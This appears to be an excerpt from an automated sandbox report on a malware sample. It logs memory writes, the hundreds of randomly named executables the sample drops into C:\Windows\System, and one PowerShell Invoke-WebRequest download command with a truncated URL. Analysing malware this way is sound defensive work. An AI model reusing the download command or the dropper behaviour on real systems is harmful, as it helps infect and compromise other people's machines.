PID 2104 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\dcFSTBl.exe
PID 2104 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\dcFSTBl.exe
PID 2104 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\yBwXTXG.exe
PID 2104 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\yBwXTXG.exe
PID 2104 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\yBwXTXG.exe
PID 2104 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\vvEAzgP.exe
PID 2104 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\vvEAzgP.exe
PID 2104 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\vvEAzgP.exe
PID 2104 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\cualdXX.exe
PID 2104 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\cualdXX.exe
PID 2104 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\cualdXX.exe
PID 2104 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\FnQPgSH.exe
PID 2104 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\FnQPgSH.exe
PID 2104 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\FnQPgSH.exe
PID 2104 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\vxQIyxs.exe
PID 2104 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\vxQIyxs.exe
PID 2104 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\vxQIyxs.exe
PID 2104 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\auvTuOf.exe
PID 2104 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\auvTuOf.exe
PID 2104 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\auvTuOf.exe
PID 2104 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\TYdzXPO.exe
PID 2104 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\TYdzXPO.exe
PID 2104 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\TYdzXPO.exe
PID 2104 wrote to memory of 804 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\UFirVxb.exe
PID 2104 wrote to memory of 804 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\UFirVxb.exe
PID 2104 wrote to memory of 804 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\UFirVxb.exe
PID 2104 wrote to memory of 560 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\aTnAPCk.exe
PID 2104 wrote to memory of 560 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\aTnAPCk.exe
PID 2104 wrote to memory of 560 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\aTnAPCk.exe
PID 2104 wrote to memory of 364 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\WtpAotk.exe
PID 2104 wrote to memory of 364 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\WtpAotk.exe
PID 2104 wrote to memory of 364 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\WtpAotk.exe
PID 2104 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\tRnWOOm.exe
PID 2104 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\tRnWOOm.exe
PID 2104 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\tRnWOOm.exe
PID 2104 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\QYIjkGj.exe
PID 2104 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\QYIjkGj.exe
PID 2104 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\QYIjkGj.exe
PID 2104 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\nCfqZyI.exe
PID 2104 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\nCfqZyI.exe
PID 2104 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\nCfqZyI.exe
PID 2104 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\RDlJFIB.exe
PID 2104 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\RDlJFIB.exe
PID 2104 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\RDlJFIB.exe
PID 2104 wrote to memory of 940 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\LneGZqL.exe
PID 2104 wrote to memory of 940 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\LneGZqL.exe
PID 2104 wrote to memory of 940 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\LneGZqL.exe
PID 2104 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\EZjAoTz.exe
PID 2104 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\EZjAoTz.exe
PID 2104 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\EZjAoTz.exe
PID 2104 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\TxjyDsq.exe
PID 2104 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\TxjyDsq.exe
PID 2104 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\TxjyDsq.exe
PID 2104 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe C:\Windows\System\WxhdyAP.exe

Processes

C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\6ca8d270f5bd9c59974aa2fabfd732e0_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\bOwsIEf.exe

C:\Windows\System\bOwsIEf.exe

C:\Windows\System\SHYViEx.exe

C:\Windows\System\SHYViEx.exe

C:\Windows\System\dcFSTBl.exe

C:\Windows\System\dcFSTBl.exe

C:\Windows\System\yBwXTXG.exe

C:\Windows\System\yBwXTXG.exe

C:\Windows\System\vvEAzgP.exe

C:\Windows\System\vvEAzgP.exe

C:\Windows\System\cualdXX.exe

C:\Windows\System\cualdXX.exe

C:\Windows\System\FnQPgSH.exe

C:\Windows\System\FnQPgSH.exe

C:\Windows\System\vxQIyxs.exe

C:\Windows\System\vxQIyxs.exe

C:\Windows\System\auvTuOf.exe

C:\Windows\System\auvTuOf.exe

C:\Windows\System\TYdzXPO.exe

C:\Windows\System\TYdzXPO.exe

C:\Windows\System\UFirVxb.exe

C:\Windows\System\UFirVxb.exe

C:\Windows\System\aTnAPCk.exe

C:\Windows\System\aTnAPCk.exe

C:\Windows\System\WtpAotk.exe

C:\Windows\System\WtpAotk.exe

C:\Windows\System\tRnWOOm.exe

C:\Windows\System\tRnWOOm.exe

C:\Windows\System\QYIjkGj.exe

C:\Windows\System\QYIjkGj.exe

C:\Windows\System\nCfqZyI.exe

C:\Windows\System\nCfqZyI.exe

C:\Windows\System\RDlJFIB.exe

C:\Windows\System\RDlJFIB.exe

C:\Windows\System\LneGZqL.exe

C:\Windows\System\LneGZqL.exe

C:\Windows\System\EZjAoTz.exe

C:\Windows\System\EZjAoTz.exe

C:\Windows\System\TxjyDsq.exe

C:\Windows\System\TxjyDsq.exe

C:\Windows\System\WxhdyAP.exe

C:\Windows\System\WxhdyAP.exe

C:\Windows\System\vanvNUE.exe

C:\Windows\System\vanvNUE.exe

C:\Windows\System\GCSuzVw.exe

C:\Windows\System\GCSuzVw.exe

C:\Windows\System\DatdwDJ.exe

C:\Windows\System\DatdwDJ.exe

C:\Windows\System\QYlJInL.exe

C:\Windows\System\QYlJInL.exe

C:\Windows\System\ddwuOGU.exe

C:\Windows\System\ddwuOGU.exe

C:\Windows\System\gnyMEel.exe

C:\Windows\System\gnyMEel.exe

C:\Windows\System\RaGfsME.exe

C:\Windows\System\RaGfsME.exe

C:\Windows\System\AovGbkG.exe

C:\Windows\System\AovGbkG.exe

C:\Windows\System\PJSqTwP.exe

C:\Windows\System\PJSqTwP.exe

C:\Windows\System\dLmIShV.exe

C:\Windows\System\dLmIShV.exe

C:\Windows\System\gwvysft.exe

C:\Windows\System\gwvysft.exe

C:\Windows\System\mzaWJTt.exe

C:\Windows\System\mzaWJTt.exe

C:\Windows\System\EHknfzd.exe

C:\Windows\System\EHknfzd.exe

C:\Windows\System\tdBKuqZ.exe

C:\Windows\System\tdBKuqZ.exe

C:\Windows\System\crxUIVS.exe

C:\Windows\System\crxUIVS.exe

C:\Windows\System\eFbkRNL.exe

C:\Windows\System\eFbkRNL.exe

C:\Windows\System\OHzonhG.exe

C:\Windows\System\OHzonhG.exe

C:\Windows\System\RqmLyGw.exe

C:\Windows\System\RqmLyGw.exe

C:\Windows\System\NxmgHJi.exe

C:\Windows\System\NxmgHJi.exe

C:\Windows\System\yfhyrZF.exe

C:\Windows\System\yfhyrZF.exe

C:\Windows\System\trkKRpA.exe

C:\Windows\System\trkKRpA.exe

C:\Windows\System\eEdwrkp.exe

C:\Windows\System\eEdwrkp.exe

C:\Windows\System\EEAbHSM.exe

C:\Windows\System\EEAbHSM.exe

C:\Windows\System\DEINBfH.exe

C:\Windows\System\DEINBfH.exe

C:\Windows\System\uaNttqa.exe

C:\Windows\System\uaNttqa.exe

C:\Windows\System\etkXNmp.exe

C:\Windows\System\etkXNmp.exe

C:\Windows\System\QFOtptN.exe

C:\Windows\System\QFOtptN.exe

C:\Windows\System\SbcCKHR.exe

C:\Windows\System\SbcCKHR.exe

C:\Windows\System\mvqCcWz.exe

C:\Windows\System\mvqCcWz.exe

C:\Windows\System\tfcniGF.exe

C:\Windows\System\tfcniGF.exe

C:\Windows\System\oGGnVrU.exe

C:\Windows\System\oGGnVrU.exe

C:\Windows\System\GKGXPCO.exe

C:\Windows\System\GKGXPCO.exe

C:\Windows\System\PuNNzGo.exe

C:\Windows\System\PuNNzGo.exe

C:\Windows\System\JIzClxr.exe

C:\Windows\System\JIzClxr.exe

C:\Windows\System\RusrGEM.exe

C:\Windows\System\RusrGEM.exe

C:\Windows\System\fLLumkD.exe

C:\Windows\System\fLLumkD.exe

C:\Windows\System\JyJOLwb.exe

C:\Windows\System\JyJOLwb.exe

C:\Windows\System\joXekos.exe

C:\Windows\System\joXekos.exe

C:\Windows\System\NofkIaF.exe

C:\Windows\System\NofkIaF.exe

C:\Windows\System\WuuMPgy.exe

C:\Windows\System\WuuMPgy.exe

C:\Windows\System\dZrVlsD.exe

C:\Windows\System\dZrVlsD.exe

C:\Windows\System\FHtKTdk.exe

C:\Windows\System\FHtKTdk.exe

C:\Windows\System\zqYetSR.exe

C:\Windows\System\zqYetSR.exe

C:\Windows\System\RSmannH.exe

C:\Windows\System\RSmannH.exe

C:\Windows\System\kMyewpD.exe

C:\Windows\System\kMyewpD.exe

C:\Windows\System\CvDCyyM.exe

C:\Windows\System\CvDCyyM.exe

C:\Windows\System\YPkXDrJ.exe

C:\Windows\System\YPkXDrJ.exe

C:\Windows\System\cfbpHty.exe

C:\Windows\System\cfbpHty.exe

C:\Windows\System\lbqBiPH.exe

C:\Windows\System\lbqBiPH.exe

C:\Windows\System\DmJaRZJ.exe

C:\Windows\System\DmJaRZJ.exe

C:\Windows\System\WENLbmK.exe

C:\Windows\System\WENLbmK.exe

C:\Windows\System\QDmlGAH.exe

C:\Windows\System\QDmlGAH.exe

C:\Windows\System\mYnGqkN.exe

C:\Windows\System\mYnGqkN.exe

C:\Windows\System\EGtlGdR.exe

C:\Windows\System\EGtlGdR.exe

C:\Windows\System\xGxYqFy.exe

C:\Windows\System\xGxYqFy.exe

C:\Windows\System\BCUqYoJ.exe

C:\Windows\System\BCUqYoJ.exe

C:\Windows\System\gOCgfoq.exe

C:\Windows\System\gOCgfoq.exe

C:\Windows\System\HDjzVBQ.exe

C:\Windows\System\HDjzVBQ.exe

C:\Windows\System\cxhhFsy.exe

C:\Windows\System\cxhhFsy.exe

C:\Windows\System\yCSTuVp.exe

C:\Windows\System\yCSTuVp.exe

C:\Windows\System\cSXBins.exe

C:\Windows\System\cSXBins.exe

C:\Windows\System\VwioLuo.exe

C:\Windows\System\VwioLuo.exe

C:\Windows\System\oIEAXBX.exe

C:\Windows\System\oIEAXBX.exe

C:\Windows\System\xNaDLoV.exe

C:\Windows\System\xNaDLoV.exe

C:\Windows\System\ZlmnNCQ.exe

C:\Windows\System\ZlmnNCQ.exe

C:\Windows\System\aVLdwqS.exe

C:\Windows\System\aVLdwqS.exe

C:\Windows\System\AruRbEL.exe

C:\Windows\System\AruRbEL.exe

C:\Windows\System\ZmvvQsg.exe

C:\Windows\System\ZmvvQsg.exe

C:\Windows\System\JrHxQAI.exe

C:\Windows\System\JrHxQAI.exe

C:\Windows\System\DTutwTE.exe

C:\Windows\System\DTutwTE.exe

C:\Windows\System\PJbbCWJ.exe

C:\Windows\System\PJbbCWJ.exe

C:\Windows\System\uDmKeMb.exe

C:\Windows\System\uDmKeMb.exe

C:\Windows\System\SGBVUQA.exe

C:\Windows\System\SGBVUQA.exe

C:\Windows\System\KpzHGxR.exe

C:\Windows\System\KpzHGxR.exe

C:\Windows\System\mfTaiMC.exe

C:\Windows\System\mfTaiMC.exe

C:\Windows\System\mvvFmUi.exe

C:\Windows\System\mvvFmUi.exe

C:\Windows\System\JNbCsSs.exe

C:\Windows\System\JNbCsSs.exe

C:\Windows\System\kpnHjNn.exe

C:\Windows\System\kpnHjNn.exe

C:\Windows\System\gRkRiOv.exe

C:\Windows\System\gRkRiOv.exe

C:\Windows\System\nUEpKqD.exe

C:\Windows\System\nUEpKqD.exe

C:\Windows\System\gMihLmb.exe

C:\Windows\System\gMihLmb.exe

C:\Windows\System\SXdFZTY.exe

C:\Windows\System\SXdFZTY.exe

C:\Windows\System\SBNsrIb.exe

C:\Windows\System\SBNsrIb.exe

C:\Windows\System\MjBygWp.exe

C:\Windows\System\MjBygWp.exe

C:\Windows\System\CKWlBGO.exe

C:\Windows\System\CKWlBGO.exe

C:\Windows\System\qgHKxZz.exe

C:\Windows\System\qgHKxZz.exe

C:\Windows\System\ylTtGch.exe

C:\Windows\System\ylTtGch.exe

C:\Windows\System\pyIpdAi.exe

C:\Windows\System\pyIpdAi.exe

C:\Windows\System\FRyLMPV.exe

C:\Windows\System\FRyLMPV.exe

C:\Windows\System\aoKAVPT.exe

C:\Windows\System\aoKAVPT.exe

C:\Windows\System\hvnzrfs.exe

C:\Windows\System\hvnzrfs.exe

C:\Windows\System\EOYcSdB.exe

C:\Windows\System\EOYcSdB.exe

C:\Windows\System\NHFiEBe.exe

C:\Windows\System\NHFiEBe.exe

C:\Windows\System\gHUsQvR.exe

C:\Windows\System\gHUsQvR.exe

C:\Windows\System\jxeKfYC.exe

C:\Windows\System\jxeKfYC.exe

C:\Windows\System\dWeQeGc.exe

C:\Windows\System\dWeQeGc.exe

C:\Windows\System\zNbhdhV.exe

C:\Windows\System\zNbhdhV.exe

C:\Windows\System\BCeLyNI.exe

C:\Windows\System\BCeLyNI.exe

C:\Windows\System\pvyxdLp.exe

C:\Windows\System\pvyxdLp.exe

C:\Windows\System\LujeGvv.exe

C:\Windows\System\LujeGvv.exe

C:\Windows\System\wQHUODy.exe

C:\Windows\System\wQHUODy.exe

C:\Windows\System\qHlWKWP.exe

C:\Windows\System\qHlWKWP.exe

C:\Windows\System\ChauCXW.exe

C:\Windows\System\ChauCXW.exe

C:\Windows\System\mmOKVJp.exe

C:\Windows\System\mmOKVJp.exe

C:\Windows\System\ygsbvjO.exe

C:\Windows\System\ygsbvjO.exe

C:\Windows\System\QtXXGrh.exe

C:\Windows\System\QtXXGrh.exe

C:\Windows\System\pILOkoG.exe

C:\Windows\System\pILOkoG.exe

C:\Windows\System\PKnGzBE.exe

C:\Windows\System\PKnGzBE.exe

C:\Windows\System\SrObNGJ.exe

C:\Windows\System\SrObNGJ.exe

C:\Windows\System\vEapTbY.exe

C:\Windows\System\vEapTbY.exe

C:\Windows\System\wpfhbKb.exe

C:\Windows\System\wpfhbKb.exe

C:\Windows\System\yZXlRaa.exe

C:\Windows\System\yZXlRaa.exe

C:\Windows\System\ZfJigmy.exe

C:\Windows\System\ZfJigmy.exe

C:\Windows\System\oWpywmV.exe

C:\Windows\System\oWpywmV.exe

C:\Windows\System\OMlJKrk.exe

C:\Windows\System\OMlJKrk.exe

C:\Windows\System\lFjgQhp.exe

C:\Windows\System\lFjgQhp.exe

C:\Windows\System\HJAFytH.exe

C:\Windows\System\HJAFytH.exe

C:\Windows\System\MuKSoeb.exe

C:\Windows\System\MuKSoeb.exe

C:\Windows\System\fhqcKOp.exe

C:\Windows\System\fhqcKOp.exe

C:\Windows\System\yGKsnQd.exe

C:\Windows\System\yGKsnQd.exe

C:\Windows\System\TfNoWEf.exe

C:\Windows\System\TfNoWEf.exe

C:\Windows\System\FpxRMba.exe

C:\Windows\System\FpxRMba.exe

C:\Windows\System\pOYXkmZ.exe

C:\Windows\System\pOYXkmZ.exe

C:\Windows\System\RajacoC.exe

C:\Windows\System\RajacoC.exe

C:\Windows\System\pHCPeZO.exe

C:\Windows\System\pHCPeZO.exe

C:\Windows\System\qIuLNJe.exe

C:\Windows\System\qIuLNJe.exe

C:\Windows\System\EPIXjbe.exe

C:\Windows\System\EPIXjbe.exe

C:\Windows\System\EUdwsAj.exe

C:\Windows\System\EUdwsAj.exe

C:\Windows\System\zdQTQue.exe

C:\Windows\System\zdQTQue.exe

C:\Windows\System\xJjRGye.exe

C:\Windows\System\xJjRGye.exe

C:\Windows\System\GVcBdJl.exe

C:\Windows\System\GVcBdJl.exe

C:\Windows\System\pHUTAun.exe

C:\Windows\System\pHUTAun.exe

C:\Windows\System\cDASFXD.exe

C:\Windows\System\cDASFXD.exe

C:\Windows\System\HcYpWgv.exe

C:\Windows\System\HcYpWgv.exe

C:\Windows\System\LwQkNxJ.exe

C:\Windows\System\LwQkNxJ.exe

C:\Windows\System\NHbJIvo.exe

C:\Windows\System\NHbJIvo.exe

C:\Windows\System\iTkhyGW.exe

C:\Windows\System\iTkhyGW.exe

C:\Windows\System\mjJYbsO.exe

C:\Windows\System\mjJYbsO.exe

C:\Windows\System\slNxrVU.exe

C:\Windows\System\slNxrVU.exe

C:\Windows\System\pEVFEed.exe

C:\Windows\System\pEVFEed.exe

C:\Windows\System\yyAgEhs.exe

C:\Windows\System\yyAgEhs.exe

C:\Windows\System\jDnEgAk.exe

C:\Windows\System\jDnEgAk.exe

C:\Windows\System\hrbvNOh.exe

C:\Windows\System\hrbvNOh.exe

C:\Windows\System\aRbUtTq.exe

C:\Windows\System\aRbUtTq.exe

C:\Windows\System\xxmGTKS.exe

C:\Windows\System\xxmGTKS.exe

C:\Windows\System\tRnfvnL.exe

C:\Windows\System\tRnfvnL.exe

C:\Windows\System\MLJcqjD.exe

C:\Windows\System\MLJcqjD.exe

C:\Windows\System\MqpkSlZ.exe

C:\Windows\System\MqpkSlZ.exe

C:\Windows\System\nDRnvQQ.exe

C:\Windows\System\nDRnvQQ.exe

C:\Windows\System\DGTTBhI.exe

C:\Windows\System\DGTTBhI.exe

C:\Windows\System\zlqxyEj.exe

C:\Windows\System\zlqxyEj.exe

C:\Windows\System\gCmHXGw.exe

C:\Windows\System\gCmHXGw.exe

C:\Windows\System\iECFGOd.exe

C:\Windows\System\iECFGOd.exe

C:\Windows\System\qfgWmFq.exe

C:\Windows\System\qfgWmFq.exe

C:\Windows\System\qSJBPmy.exe

C:\Windows\System\qSJBPmy.exe

C:\Windows\System\UBRUWNj.exe

C:\Windows\System\UBRUWNj.exe

C:\Windows\System\MBFeDpe.exe

C:\Windows\System\MBFeDpe.exe

C:\Windows\System\kklkVUw.exe

C:\Windows\System\kklkVUw.exe

C:\Windows\System\MguVWcu.exe

C:\Windows\System\MguVWcu.exe

C:\Windows\System\RQnJYGK.exe

C:\Windows\System\RQnJYGK.exe

C:\Windows\System\hNBibqn.exe

C:\Windows\System\hNBibqn.exe

C:\Windows\System\vDTKkUT.exe

C:\Windows\System\vDTKkUT.exe

C:\Windows\System\RXpifGB.exe

C:\Windows\System\RXpifGB.exe

C:\Windows\System\CiDorlg.exe

C:\Windows\System\CiDorlg.exe

C:\Windows\System\QHaZsNZ.exe

C:\Windows\System\QHaZsNZ.exe

C:\Windows\System\CfiqtPm.exe

C:\Windows\System\CfiqtPm.exe

C:\Windows\System\ZedtWVg.exe

C:\Windows\System\ZedtWVg.exe

C:\Windows\System\vsziGeP.exe

C:\Windows\System\vsziGeP.exe

C:\Windows\System\ebUJtlz.exe

C:\Windows\System\ebUJtlz.exe

C:\Windows\System\IjUUkLb.exe

C:\Windows\System\IjUUkLb.exe

C:\Windows\System\DVcsOxn.exe

C:\Windows\System\DVcsOxn.exe

C:\Windows\System\fHAzDtk.exe

C:\Windows\System\fHAzDtk.exe

C:\Windows\System\uQjqwQy.exe

C:\Windows\System\uQjqwQy.exe

C:\Windows\System\ZnfYrUz.exe

C:\Windows\System\ZnfYrUz.exe

C:\Windows\System\DHqkYnh.exe

C:\Windows\System\DHqkYnh.exe

C:\Windows\System\NphMSPN.exe

C:\Windows\System\NphMSPN.exe

C:\Windows\System\zMARuGN.exe

C:\Windows\System\zMARuGN.exe

C:\Windows\System\DltvTpq.exe

C:\Windows\System\DltvTpq.exe

C:\Windows\System\SLdecce.exe

C:\Windows\System\SLdecce.exe

C:\Windows\System\pDVAubx.exe

C:\Windows\System\pDVAubx.exe

C:\Windows\System\AdGviCN.exe

C:\Windows\System\AdGviCN.exe

C:\Windows\System\tfJPuWA.exe

C:\Windows\System\tfJPuWA.exe

C:\Windows\System\Hruyida.exe

C:\Windows\System\Hruyida.exe

C:\Windows\System\TbgkZLF.exe

C:\Windows\System\TbgkZLF.exe

C:\Windows\System\LQHhxSP.exe

C:\Windows\System\LQHhxSP.exe

C:\Windows\System\xwXjHeO.exe

C:\Windows\System\xwXjHeO.exe

C:\Windows\System\eNZsClT.exe

C:\Windows\System\eNZsClT.exe

C:\Windows\System\fRbaLdx.exe

C:\Windows\System\fRbaLdx.exe

C:\Windows\System\ulvsgeu.exe

C:\Windows\System\ulvsgeu.exe

C:\Windows\System\wTdVNMj.exe

C:\Windows\System\wTdVNMj.exe

C:\Windows\System\PaQDITC.exe

C:\Windows\System\PaQDITC.exe

C:\Windows\System\UphkeUt.exe

C:\Windows\System\UphkeUt.exe

C:\Windows\System\jlWRhEh.exe

C:\Windows\System\jlWRhEh.exe

C:\Windows\System\XZzeEQA.exe

C:\Windows\System\XZzeEQA.exe

C:\Windows\System\QdlMqyj.exe

C:\Windows\System\QdlMqyj.exe

C:\Windows\System\LFafSjv.exe

C:\Windows\System\LFafSjv.exe

C:\Windows\System\BqCDkRZ.exe

C:\Windows\System\BqCDkRZ.exe

C:\Windows\System\zMDYfiJ.exe

C:\Windows\System\zMDYfiJ.exe

C:\Windows\System\WjsqQiO.exe

C:\Windows\System\WjsqQiO.exe

C:\Windows\System\kehPgzs.exe

C:\Windows\System\kehPgzs.exe

C:\Windows\System\mAeGIzF.exe

C:\Windows\System\mAeGIzF.exe

C:\Windows\System\otFiohu.exe

C:\Windows\System\otFiohu.exe

C:\Windows\System\zsIHurR.exe

C:\Windows\System\zsIHurR.exe

C:\Windows\System\CEWCnTt.exe

C:\Windows\System\CEWCnTt.exe

C:\Windows\System\rwyZTZz.exe

C:\Windows\System\rwyZTZz.exe

C:\Windows\System\bkdMHzB.exe

C:\Windows\System\bkdMHzB.exe

C:\Windows\System\mNKToAY.exe

C:\Windows\System\mNKToAY.exe

C:\Windows\System\hJYbkpF.exe

C:\Windows\System\hJYbkpF.exe

C:\Windows\System\RGUFbDT.exe

C:\Windows\System\RGUFbDT.exe

C:\Windows\System\svoTXKz.exe

C:\Windows\System\svoTXKz.exe

C:\Windows\System\rbqzvmr.exe

C:\Windows\System\rbqzvmr.exe

C:\Windows\System\vSsHAac.exe

C:\Windows\System\vSsHAac.exe

C:\Windows\System\EtCVclZ.exe

C:\Windows\System\EtCVclZ.exe

C:\Windows\System\svNmrFZ.exe

C:\Windows\System\svNmrFZ.exe

C:\Windows\System\rPcByVW.exe

C:\Windows\System\rPcByVW.exe

C:\Windows\System\bIVlATq.exe

C:\Windows\System\bIVlATq.exe

C:\Windows\System\yPqkGrr.exe

C:\Windows\System\yPqkGrr.exe

C:\Windows\System\ISmtneC.exe

C:\Windows\System\ISmtneC.exe

C:\Windows\System\kMoiyww.exe

C:\Windows\System\kMoiyww.exe

C:\Windows\System\rddIXwP.exe

C:\Windows\System\rddIXwP.exe

C:\Windows\System\gJmdwcA.exe

C:\Windows\System\gJmdwcA.exe

